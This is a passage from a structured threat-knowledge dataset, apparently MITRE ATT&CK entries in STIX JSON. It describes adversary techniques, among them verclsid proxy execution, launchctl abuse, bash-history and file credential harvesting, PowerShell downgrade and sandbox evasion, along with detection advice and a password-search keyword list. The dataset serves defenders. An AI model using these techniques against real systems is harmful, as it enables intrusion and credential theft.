actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Rodrigo Garcia, Red Canary"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Digital Certificate Validation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", "created": "2020-08-10T13:59:38.443Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/012", "external_id": "T1218.012"}, {"source_name": "BOHOPS Abusing the COM Registry", "description": "BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.", "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"}, {"source_name": "Red Canary Verclsid.exe", "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.", "url": "https://redcanary.com/blog/verclsid-exe-threat-detection/"}, {"source_name": "LOLBAS Verclsid", "description": "LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"}, {"source_name": "Nick Tyrer GitHub", "description": "Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.", "url": "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5"}, {"source_name": "WinOSBite verclsid.exe", "description": "verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block\u00a0. Retrieved August 10, 2020.", "url": "https://www.winosbite.com/verclsid-exe/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Compromise Accounts", "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", "created": "2020-10-01T01:17:15.965Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1586", "external_id": "T1586"}, {"source_name": "AnonHBGary", "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/"}, {"source_name": "Microsoft DEV-0537", "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Launchctl", "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", "created": "2020-03-10T18:26:56.187Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1569/001", "external_id": "T1569.001"}, {"source_name": "Launchctl Man", "description": "SS64. (n.d.). launchctl. Retrieved March 28, 2020.", "url": "https://ss64.com/osx/launchctl.html"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}, {"source_name": "20 macOS Common Tools and Techniques", "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Botnet", "description": "Adversaries may compromise numerous third-party systems to form a botnet\u00a0that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", "created": "2020-10-01T00:58:35.269Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/005", "external_id": "T1584.005"}, {"source_name": "Dell Dridex Oct 2015", "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.", "url": "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation"}, {"source_name": "Imperva DDoS for Hire", "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.", "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/"}, {"source_name": "Norton Botnet", "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.", "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Network Device CLI", "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", "created": "2020-10-20T00:09:33.072Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/008", "external_id": "T1059.008"}, {"source_name": "Cisco IOS Software Integrity Assurance - Command History", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Bash History", "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user\u2019s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user\u2019s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "created": "2020-02-04T13:02:11.685Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/003", "external_id": "T1552.003"}, {"source_name": "External to DA, the OS X Way", "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-03T16:40:15.445Z", "name": "Downgrade Attack", "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system\u2019s backward compatibility to force it into less secure modes of operation. \n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Mayuresh Dani, Qualys", "Daniel Feichter, @VirtualAllocEx, Infosec Tirol", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell \u2013v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.\n\nMonitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)\n\nMonitor network data to detect cases where HTTP is used instead of HTTPS.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "created": "2021-10-08T14:06:28.212Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/010", "external_id": "T1562.010"}, {"source_name": "Crowdstrike Downgrade", "description": "Bart Lenaerts-Bergman. (2023, March 14). WHAT ARE DOWNGRADE ATTACKS?. Retrieved May 24, 2023.", "url": "https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/"}, {"source_name": "Targeted SSL Stripping Attacks Are Real", "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.", "url": "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/"}, {"source_name": "CrowdStrike BGH Ransomware 2021", "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.", "url": "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"}, {"source_name": "att_def_ps_logging", "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.", "url": "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/"}, {"source_name": "inv_ps_attacks", "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.", "url": "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/"}, {"source_name": "Mandiant BYOL 2018", "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 8, 2021.", "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"}, {"source_name": "Praetorian TLS Downgrade Attack 2014", "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.", "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "XPC Services", "description": "Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)\n\nAdversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Csaba Fitzl @theevilbit of Offensive Security"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19", "created": "2021-10-12T06:45:36.763Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1559/003", "external_id": "T1559.003"}, {"source_name": "creatingXPCservices", "description": "Apple. (2016, September 9). Creating XPC Services. Retrieved April 19, 2022.", "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1"}, {"source_name": "Designing Daemons Apple Dev", "description": "Apple. (n.d.). Retrieved October 12, 2021.", "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html"}, {"source_name": "CVMServer Vuln", "description": "Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability in macOS and iOS. Retrieved October 12, 2021.", "url": "https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html"}, {"source_name": "Learn XPC Exploitation", "description": "Wojciech Regu\u0142a. (2020, June 29). Learn XPC exploitation. Retrieved October 12, 2021.", "url": "https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Virtualization/Sandbox Evasion", "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Deloitte Threat Library Team", "Sunny Neo"], "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host forensic analysis", "Signature-based detection", "Static File Analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "created": "2019-04-17T22:22:24.505Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1497", "external_id": "T1497"}, {"source_name": "Deloitte Environment Awareness", "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc"}, {"source_name": "Unit 42 Pirpi July 2015", "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.", "url": "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Web Service", "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Anastasios Pingios"], "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "created": "2017-05-31T21:31:13.915Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1102", "external_id": "T1102"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-15T21:33:00.213Z", "name": "Credentials In Files", "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Rory McCune, Aqua Security", "Jay Chen, Palo Alto Networks", "Yossi Weizman, Azure Defender Research Team", "Vishwas Manral, McAfee", "Microsoft Threat Intelligence Center (MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", 